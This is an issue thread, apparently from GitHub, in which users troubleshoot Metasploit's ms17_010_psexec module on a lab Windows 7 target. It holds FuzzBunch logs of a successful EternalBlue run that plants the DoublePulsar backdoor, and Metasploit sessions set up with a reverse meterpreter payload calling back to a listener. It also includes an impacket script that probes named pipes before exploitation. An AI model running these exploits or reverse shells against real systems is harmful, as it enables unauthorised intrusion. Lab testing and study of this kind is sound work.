How'd you do it?
```
fb Touch (Namedpipetouch) > execute
[!] Preparing to Execute Namedpipetouch
[*] Redirection OFF
[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [10.11.1.73] :
[?] Destination Port [445] :
[+] (TCP) Local 10.11.1.73:445
[+] Configure Plugin Remote Tunnels
Module: Namedpipetouch
======================
Name Value
---- -----
NetworkTimeout 60
TargetIp 10.11.1.73
TargetPort 445
UsingNbt False
PipeList ['\PIPE\browser', '\PIPE\lsarpc', '\PIPE\spoolss',
'\PIPE\360OnAccessGet', '\PIPE\360OnAccessSet', '
\PIPE\aswUpdSv', '\PIPE\afwCallbackPipe2', '\PIPE\
afwCallbackPipe2', '\PIPE\aswUpdSv', '\PIPE\_pspus
er_780_AVGIDSMONITOR.EXE_9d97da47-8de1-4699-b3da-9
eafb262f2a4', '\PIPE\AVG7B14C58C-E30D-11DB-B553-F8
... (plus 47 more lines)
DescList ['OS Pipe: computer browser', 'OS Pipe: lsass rpc'
, 'OS Pipe: print spooler', '360 Safe', '360 Safe'
, 'alwil Avast professional 4.8 Avast Internet Sec
urity v5.0', 'Avast Internet Security 5.0', 'Avast
Internet Security 5.0', 'Avast pro 4.8 or Avast I
S v5.0', 'AVG IS 8.5', 'AVG IS 8.5', 'AVG IS 8.5',
... (plus 35 more lines)
Protocol SMB
[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[+] Initializing Connection...
[+] Connection established.
[+] Testing 86 pipes
[+] Testing for OS Pipe: computer browser
[+] Pipe Found: \PIPE\browser
[+] Testing for OS Pipe: lsass rpc
[+] Pipe Found: \PIPE\lsarpc
```
Throwing EternalBlue from here works.
```
Name Value
---- -----
DaveProxyPort 0
NetworkTimeout 60
TargetIp 10.11.1.73
TargetPort 445
VerifyTarget True
VerifyBackdoor True
MaxExploitAttempts 3
GroomAllocations 12
ShellcodeBuffer
Target WIN72K8R2
[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[*] Connecting to target for exploitation.
[+] Connection established for exploitation.
[*] Pinging backdoor...
[+] Backdoor not installed, game on.
[*] Target OS selected valid for OS indicated by SMB reply
[*] CORE raw buffer dump (43 bytes):
0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
0x00000020 69 63 65 20 50 61 63 6b 20 31 00 ice Pack 1.
[*] Building exploit buffer
[*] Sending all but last fragment of exploit packet
................DONE.
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Starting non-paged pool grooming
[+] Sending SMBv2 buffers
.............DONE.
[+] Sending large SMBv1 buffer..DONE.
[+] Sending final SMBv2 buffers......DONE.
[+] Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Sending last fragment of exploit packet!
DONE.
[*] Receiving response from exploit packet
[+] ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] Sending egg to corrupted connection.
[*] Triggering free of corrupted buffer.
[*] Pinging backdoor...
[+] Backdoor returned code: 10 - Success!
[+] Ping returned Target architecture: x86 (32-bit)
[+] Backdoor installed
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] CORE sent serialized output blob (2 bytes):
0x00000000 08 00 ..
[*] Received output parameters from CORE
[+] CORE terminated with status code 0x00000000
[+] Eternalblue Succeeded
fb Special (Eternalblue) >
```
When trying to use the new module, I have encountered 3 instances where Eternalblue worked but this module bailed due to not finding a named pipe.
```
msf5 exploit(windows/smb/ms17_010_psexec) > show options
Module options (exploit/windows/smb/ms17_010_psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
DBGTRACE false yes Show extra debug trace info
LEAKATTEMPTS 99 yes How many times to try to leak transaction
NAMEDPIPE no A named pipe that can be connected to (leave blank for auto)
RHOST 10.11.1.73 yes The target address
RPORT 445 yes The Target port
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
Payload options (windows/meterpreter/reverse_http):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.11.0.70 yes The local listener hostname
LPORT 8443 yes The local listener port
LURI no The HTTP Path
Exploit target:
Id Name
-- ----
0 Automatic
msf5 exploit(windows/smb/ms17_010_psexec) > exploit
[*] 10.11.1.73:445 - Target OS: Windows 7 Professional 7601 Service Pack 1
[-] 10.11.1.73:445 - Unable to find accessible named pipe!
```
Even when I specify the NAMEDPIPE it is still unable to find it. Looking at Wireshark, I can see that it detects it and gets an ACCESS DENIED.
If a named pipe is not detected, should it just use Eternalblue? I do not see it using named pipes in the actual exploit.
What OS are you running Metasploit on? Kali
My module always said `/usr/share/metasploit-framework/modules/auxiliary/admin/smb/ms17_010_command.rb: NameError uninitialized constant Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010`.
I don't know why; could you help me handle this issue?
Mine did too; the easiest thing to do is check out the dev branch. It fixed my stuff. I then ran `cp -R /root/git/metasploit-framework/ /real/path/to/metasploit-framework`. That fixed the issues.
Hmm, if you are getting access denied, does this mean that authentication via SMBUser/SMBPass is needed on the target? Can you say more about the target @Cr0n1c ?
Emm... I still have some questions. You mean, git this Metasploit framework to my Kali, then run it?
I moved ms17_010_psexec.rb to /usr/share/metasploit-framework/modules/exploit/windows/smb, which is the same path as in this git repo. But it doesn't work...
@Shadowshusky your issues aren't related to detecting named pipes. See issue #9499.
@bcoles thanks,i will try it.
me too
-> fuzzbunch-2018-02-08.11.31.26.989000.txt : Contains the order I ran the scripts.
-> smbtouch
-> Smbtouch-1.1.1.exe-2018-02-08.11.31.49.254000.txt: Text based results of the scan
-> smbtouch.pcap: Wireshark capture of the scan
-> namedpipetouch
-> Namedpipetouch-2.0.0.exe-2018-02-08.11.32.55.080000.txt: Text based results of the scan
-> namedpipetouch.pcap: Wireshark capture of the scan
-> eternalblue
-> Eternalblue-2.2.0.exe-2018-02-08.11.34.50.727000.txt: Text based results of exploit (it was already implanted, so it bailed)
-> Eternalblue-2.2.0.exe-2018-02-08.11.41.57.920000.txt: Text based results of exploit
-> eternalblue_fuzzbunch.pcap: Wireshark capture of the successful exploit (not the already-sploited one)
-> doublepulsar
-> Doublepulsar-1.3.1.exe-2018-02-08.11.44.06.388000.txt: Text based results [proof of successful sploit]
Metasploit
===================================================
```
msf5 > use auxiliary/scanner/smb/smb_version
msf5 auxiliary(scanner/smb/smb_version) > set RHOSTS 10.11.1.73
RHOSTS => 10.11.1.73
msf5 auxiliary(scanner/smb/smb_version) > run
[+] 10.11.1.73:445 - Host is running Windows 7 Professional SP1 (build:7601) (name:GAMMA) (workgroup:WORKGROUP )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/smb_version) > use auxiliary/scanner/smb/pipe_auditor
msf5 auxiliary(scanner/smb/pipe_auditor) > show options
Module options (auxiliary/scanner/smb/pipe_auditor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads
msf5 auxiliary(scanner/smb/pipe_auditor) > set RHOSTS 10.11.1.73
RHOSTS => 10.11.1.73
msf5 auxiliary(scanner/smb/pipe_auditor) > run
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/pipe_auditor) > use exploit/windows/smb/ms17_010_psexec
msf5 exploit(windows/smb/ms17_010_psexec) > set RHOST 10.11.1.73
RHOST => 10.11.1.73
msf5 exploit(windows/smb/ms17_010_psexec) > show options
Module options (exploit/windows/smb/ms17_010_psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
DBGTRACE false yes Show extra debug trace info
LEAKATTEMPTS 99 yes How many times to try to leak transaction
NAMEDPIPE no A named pipe that can be connected to (leave blank for auto)
RHOST 10.11.1.73 yes The target address
RPORT 445 yes The Target port
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
Exploit target:
Id Name
-- ----
0 Automatic
msf5 exploit(windows/smb/ms17_010_psexec) > exploit
[*] Started reverse TCP handler on 10.11.0.70:4444
[*] 10.11.1.73:445 - Target OS: Windows 7 Professional 7601 Service Pack 1
[-] 10.11.1.73:445 - Unable to find accessible named pipe!
[*] Exploit completed, but no session was created.
```
===================================================
-> msf_smb_version_and_pipe_auditor.pcap: Wireshark capture of the scan.
-> msf_ms17_010_psexec.pcap: Wireshark capture of the failed exploit attempt.
CobaltStrike
-> 10.11.1.73_system_info.txt: ran systeminfo and dir on C:\. Target is an x86 Windows 7.
10.11.1.73_system_info.txt
Doublepulsar-1.3.1.exe-2018-02-08.11.43.12.308000.log
Doublepulsar-1.3.1.exe-2018-02-08.11.44.06.388000.log
Doublepulsar-1.3.1.exe-2018-02-08.11.44.27.420000.log
Eternalblue-2.2.0.exe-2018-02-08.11.34.50.727000.log
Eternalblue-2.2.0.exe-2018-02-08.11.41.57.920000.log
fuzzbunch-2018-02-08.11.31.26.967000.log
fuzzbunch-2018-02-08.11.31.26.989000.log
Namedpipetouch-2.0.0.exe-2018-02-08.11.32.55.080000.log
Smbtouch-1.1.1.exe-2018-02-08.11.31.49.254000.log
Smbtouch-1.1.1.exe-2018-02-08.11.44.54.682000.log
Based on what I am seeing... the eternalblue exploit does not rely on needing a namedpipe. It looks like the other eternals need an authenticated pipe to work.
Me too, I'm on the same target.
Have you solved the problem?@Cr0n1c
Named pipe on Windows 10???

To be able to use auxiliary/admin/smb/ms17_010_command:
+
+1. You can OPTIONALLY use a valid username/password to bypass most of these requirements.
+2. The firewall must allow SMB traffic.
+3. The target must use SMBv1.
+4. The target must be missing the MS17-010 patch.
+5. The target must allow anonymous IPC$ and a Named Pipe.
+
+You can check all of these with the SMB MS17-010 and Pipe Auditor auxiliary scanner modules.
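As an added example (my own code, not Metasploit's and not from any post in this thread), the Python script below does the check the quoted requirements describe from outside Metasploit: it sets up an SMB session, tree-connects to IPC$, tries to open a list of named pipes, and classifies the NTSTATUS each step returns. That separates the case reported earlier in the thread (IPC$ connects, every pipe open comes back ACCESS DENIED in Wireshark, and ms17_010_psexec prints "Unable to find accessible named pipe!") from a rejected session or a pipe that simply does not exist. Live probing uses impacket's `SMBConnection` (`connectTree`, `openFile`, `closeFile`, `disconnectTree`, `login`, `logoff`); the pipe list, the `FakeSMBConnection` stand-in and the host/user/password arguments are my assumptions, and ms17_010_psexec's own automatic pipe list is longer than the one tried here.

```python
"""Added example, not Metasploit code and not from this thread. It checks what
ms17_010_psexec needs (an SMB session, a tree connect to IPC$, one named pipe
that opens) and classifies the NTSTATUS the target returns. Live probing uses
impacket, imported lazily so the file also runs offline against the constructed
FakeSMBConnection, modelled on the thread's Windows 7 Pro target."""
import sys

STATUS_SUCCESS = 0x00000000
STATUS_ACCESS_DENIED = 0xC0000022
STATUS_OBJECT_NAME_NOT_FOUND = 0xC0000034

# Assumption: pipes to try. The first three are the ones Namedpipetouch found
# above; ms17_010_psexec's own auto list is longer and is not reproduced here.
DEFAULT_PIPES = ("browser", "lsarpc", "spoolss", "srvsvc", "netlogon", "samr", "wkssvc")

def _ntstatus(exc):
    """impacket's SessionError exposes the NTSTATUS via getErrorCode()."""
    getter = getattr(exc, "getErrorCode", None)
    return getter() if callable(getter) else None

def probe_pipes(conn, pipes=DEFAULT_PIPES):
    """Return (verdict, {pipe: ntstatus}). conn is an authenticated object with
    SMBConnection's connectTree/openFile/closeFile/disconnectTree methods."""
    try:
        tid = conn.connectTree("IPC$")
    except Exception as exc:
        return "no_ipc", {"IPC$": _ntstatus(exc)}
    status = {}
    for pipe in pipes:
        try:
            fid = conn.openFile(tid, "\\" + pipe)  # pipe names are relative to IPC$
            conn.closeFile(tid, fid)
            status[pipe] = STATUS_SUCCESS
        except Exception as exc:
            status[pipe] = _ntstatus(exc)
    conn.disconnectTree(tid)
    if STATUS_SUCCESS in status.values():
        return "ok", status
    if all(code == STATUS_ACCESS_DENIED for code in status.values()):
        return "pipes_denied", status
    return "no_pipe", status

def explain(verdict):
    """What each verdict means for exploit/windows/smb/ms17_010_psexec."""
    return {
        "ok": "a pipe opens; leave NAMEDPIPE blank or set it to one with STATUS_SUCCESS",
        "pipes_denied": "IPC$ connects but every pipe open is STATUS_ACCESS_DENIED: the "
                        "'Unable to find accessible named pipe!' case; retry with SMBUser/SMBPass",
        "no_pipe": "IPC$ connects but none of the probed pipes exists or opens; try other names",
        "no_ipc": "tree connect to IPC$ refused; the share is the problem, not the pipes",
        "no_session": "session setup refused; anonymous access is off, credentials are required",
    }[verdict]

class _FakeSessionError(Exception):
    """Mimics impacket.smbconnection.SessionError's getErrorCode()."""
    def __init__(self, code):
        super().__init__(hex(code))
        self.code = code
    def getErrorCode(self):
        return self.code

class FakeSMBConnection:
    """Constructed stand-in: pipe_status maps pipe name to NTSTATUS; anything
    not listed is ACCESS_DENIED, which is what the thread's target returned."""
    def __init__(self, ipc_status=STATUS_SUCCESS, pipe_status=None):
        self.ipc_status = ipc_status
        self.pipe_status = pipe_status or {}
    def connectTree(self, share):
        if self.ipc_status != STATUS_SUCCESS:
            raise _FakeSessionError(self.ipc_status)
        return 1
    def openFile(self, tid, path, **kwargs):
        code = self.pipe_status.get(path.lstrip("\\"), STATUS_ACCESS_DENIED)
        if code != STATUS_SUCCESS:
            raise _FakeSessionError(code)
        return 7
    def closeFile(self, tid, fid): pass
    def disconnectTree(self, tid): pass

def probe_host(host, user="", password="", domain="", pipes=DEFAULT_PIPES):
    """Live probe (pip install impacket); anonymous session unless creds are given."""
    from impacket.smbconnection import SMBConnection
    conn = SMBConnection(host, host, sess_port=445)
    try:
        conn.login(user, password, domain)
    except Exception as exc:
        conn.close()
        return "no_session", {"login": _ntstatus(exc)}
    try:
        return probe_pipes(conn, pipes)
    finally:
        conn.logoff()

if __name__ == "__main__":
    if len(sys.argv) > 1:  # usage: probe.py 10.11.1.73 [user] [password] [domain]
        verdict, status = probe_host(*sys.argv[1:5])
    else:                  # offline: the constructed Windows 7 Pro stand-in
        verdict, status = probe_pipes(FakeSMBConnection())
    print(verdict, {k: (hex(v) if v is not None else None) for k, v in status.items()})
    print(explain(verdict))
```

Run it with no arguments to see the offline stand-in produce the `pipes_denied` verdict; run it with a host (and optionally user, password, domain) to probe a real target, which is the quickest way to tell whether setting SMBUser/SMBPass on the module is going to change anything.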
I guess the problem may happen in the named pipe. Maybe the target changed some options (such as some security standard), so we can't read the named pipe. I guess if we have the password to log in to SMB, maybe it can succeed.
@Shadowshusky Yes, but if I already have the password, what the fuck do I want the ms17 exploit for? For that there is the psexec exploit alone, because what you mention makes this "exploit" useless. Eternal Blue does work, but Eternal Synergy with champions is very conflammatory. Obviously the OS is vulnerable; when I build the virtual lab I make sure it is vulnerable, and the Eternal Blue exploit works perfectly, but this one doesn't, so WTF? What's going on?
My side is all Windows 10 14393.
There is no success.
In the same boat here... works flawlessly on Win 7 Ultimate but won't in Win 7 Pro.
In the same boat too.
You just need access to the IPC$ share, not a named pipe.
> Based on what I am seeing... the eternalblue exploit does not rely on needing a namedpipe. It looks like the other eternals need an authenticated pipe to work.

Have you solved your problem?